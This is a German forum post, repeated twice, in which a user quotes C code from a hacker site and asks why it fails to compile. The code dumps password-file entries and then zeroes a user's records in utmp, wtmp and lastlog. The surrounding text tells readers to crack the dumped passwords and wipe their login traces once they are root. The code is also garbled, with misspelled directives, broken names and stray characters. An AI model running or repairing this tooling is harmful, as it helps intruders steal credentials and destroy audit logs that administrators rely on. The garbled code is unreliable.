linuxhanz
31-05-2001, 18:54
erstmal: ich bin definitv kein HACKER, klar?
Auf der Suche nach Scripten bin auf dieses
C++ Script gestoßen (www.nethacker.de):
<BLOCKQUOTE><font size="1" face="Arial,Helvetica,Geneva">Zitat:</font><HR>
struct SHADOWPW { /* see getpwent(3) */ char *pw_name; char *pw_passwd; int pw_uid; int pw_gid; int
pw_quota; char *pw_comment; char *pw_gecos; char *pw_dir; char *pw_shell; }; struct passwd *getpwent(),
*getpwuid(), *getpwnam();
#ifdef elxsis? /* Name of the shadow password file. Contains password and aging info* #define SHADOW "/etc/shadowpw" #define
SHADOWPW_PAG "/etc/shadowpw.pag" #define SHADOWPW_DIR "/etc/shadowpw.dir" /* * Shadow password file
pwd->pw_gecos field contains: * * <type>,<period>,<last_time>,<old_time>,<old_password> * * <type> = Type of
password criteria to enforce (type int). * BSD_CRIT (0), normal BSD. * STR_CRIT (1), strong passwords. * <period> = Password aging period
(type long). * 0, no aging. * else, number of seconds in aging period. * <last_time> = Time (seconds from epoch) of the last
password * change (type long). * 0, never changed.n * <old_time> =Time (seconds from ephoch) That the current password * Was made the
<old_password> (type long). * 0, never changed.ewromsinm * <old_password> = Password (encrypted) saved for an aging <period> t *
prevent reuse during that period (type char [20]). * "*******", no <old_password>. */
/* number o tries to change an aged password */
#deffine CHANGE_TRIES 3
/* program to execute to change passwords */
#define PASSWD_PROG "/bin/passwd"
/* Name of the password aging exempt user names and max number of entir
#define EXEMPTPW "/etc/exemptpw" #define MAX_EXEMPT 100
/* Password criteria to enforce */
#define BSD_CRIT 0 /* Normal BSD password criteria */ #define STR_CRIT 1 /* Strong password criteria */ #define MAX_CRIT 1
#endif elxsi #define NULL 0 main() { struct passwd *p; int i; for (;1 ;) {; p=getpwent();
if (p==NULL) return; printpw(p); } }
printpw(a) struct SHADOWPW *a; { printf("%s:%s:%d:%d:%s:%s:%s\n", a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,
a->pw_gecos,a->pw_dir,a->pw_shell); }
/* SunOS 5.0 /etc/shadow */ /* SunOS4.1+c2 /etc/security/passwd.adjunct */
Wenn ihr dann das pwd file habt, crack es mit einem cracker (In astalavista.box.sk oder altavista.digital nach cracker suchen). Wenn ihr dann root seit, solltest ihr
noch eueren login löschen. Also wieder ein c script.
#include #include #include #include #include #include #include #include #define
WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,_RDWR))>=0) { while(read (f,
&utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(
utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent));
} close(f); } }
void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos;
pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) *pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos =
-1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L;
} } close(f); } }
void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >=0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof(
newll )); close(f); }
} else printf("%s: ?/n",who); }
mai(argc,argv) int argc; char *argv[]; { if (argc--2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]);
kill_utmp(argv[1]); printf("Zap2!/n"); } else printf("Error./n"); }
[/quote]
Bei dem Versuch es mit g++ zu compilieren
gabs nur fehler (garbage etc.)
Wie kann ich dass ding etwas ordnen?
Auf der Suche nach Scripten bin auf dieses
C++ Script gestoßen (www.nethacker.de):
<BLOCKQUOTE><font size="1" face="Arial,Helvetica,Geneva">Zitat:</font><HR>
struct SHADOWPW { /* see getpwent(3) */ char *pw_name; char *pw_passwd; int pw_uid; int pw_gid; int
pw_quota; char *pw_comment; char *pw_gecos; char *pw_dir; char *pw_shell; }; struct passwd *getpwent(),
*getpwuid(), *getpwnam();
#ifdef elxsis? /* Name of the shadow password file. Contains password and aging info* #define SHADOW "/etc/shadowpw" #define
SHADOWPW_PAG "/etc/shadowpw.pag" #define SHADOWPW_DIR "/etc/shadowpw.dir" /* * Shadow password file
pwd->pw_gecos field contains: * * <type>,<period>,<last_time>,<old_time>,<old_password> * * <type> = Type of
password criteria to enforce (type int). * BSD_CRIT (0), normal BSD. * STR_CRIT (1), strong passwords. * <period> = Password aging period
(type long). * 0, no aging. * else, number of seconds in aging period. * <last_time> = Time (seconds from epoch) of the last
password * change (type long). * 0, never changed.n * <old_time> =Time (seconds from ephoch) That the current password * Was made the
<old_password> (type long). * 0, never changed.ewromsinm * <old_password> = Password (encrypted) saved for an aging <period> t *
prevent reuse during that period (type char [20]). * "*******", no <old_password>. */
/* number o tries to change an aged password */
#deffine CHANGE_TRIES 3
/* program to execute to change passwords */
#define PASSWD_PROG "/bin/passwd"
/* Name of the password aging exempt user names and max number of entir
#define EXEMPTPW "/etc/exemptpw" #define MAX_EXEMPT 100
/* Password criteria to enforce */
#define BSD_CRIT 0 /* Normal BSD password criteria */ #define STR_CRIT 1 /* Strong password criteria */ #define MAX_CRIT 1
#endif elxsi #define NULL 0 main() { struct passwd *p; int i; for (;1 ;) {; p=getpwent();
if (p==NULL) return; printpw(p); } }
printpw(a) struct SHADOWPW *a; { printf("%s:%s:%d:%d:%s:%s:%s\n", a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,
a->pw_gecos,a->pw_dir,a->pw_shell); }
/* SunOS 5.0 /etc/shadow */ /* SunOS4.1+c2 /etc/security/passwd.adjunct */
Wenn ihr dann das pwd file habt, crack es mit einem cracker (In astalavista.box.sk oder altavista.digital nach cracker suchen). Wenn ihr dann root seit, solltest ihr
noch eueren login löschen. Also wieder ein c script.
#include #include #include #include #include #include #include #include #define
WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,_RDWR))>=0) { while(read (f,
&utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(
utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent));
} close(f); } }
void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos;
pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) *pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos =
-1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L;
} } close(f); } }
void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >=0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof(
newll )); close(f); }
} else printf("%s: ?/n",who); }
mai(argc,argv) int argc; char *argv[]; { if (argc--2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]);
kill_utmp(argv[1]); printf("Zap2!/n"); } else printf("Error./n"); }
[/quote]
Bei dem Versuch es mit g++ zu compilieren
gabs nur fehler (garbage etc.)
Wie kann ich dass ding etwas ordnen?